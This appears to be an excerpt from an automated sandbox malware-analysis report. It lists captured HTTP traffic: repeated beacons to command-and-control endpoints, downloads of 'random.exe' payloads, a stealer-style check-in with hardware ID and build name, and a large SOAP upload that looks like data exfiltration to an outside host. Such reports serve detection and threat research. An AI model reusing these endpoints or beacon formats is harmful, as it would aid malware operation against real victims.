Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062153001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/SQL_gulong/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJEHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 38 35 46 33 43 42 34 35 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 2d 2d 0d 0a Data Ascii: ------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="hwid"2285F3CB45684217651120------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="build"kira------AECFCAAECBGDGDHIEHJE--
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062154001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /files/Savelij_sL/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 103.84.89.222:33791Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062155001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 185.215.113.97If-Modified-Since: Sat, 01 Feb 2025 15:29:56 GMTIf-None-Match: "679e3df4-1de400"
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 103.84.89.222:33791Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062156001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /files/Jz1e1/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 103.84.89.222:33791Content-Length: 2721523Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
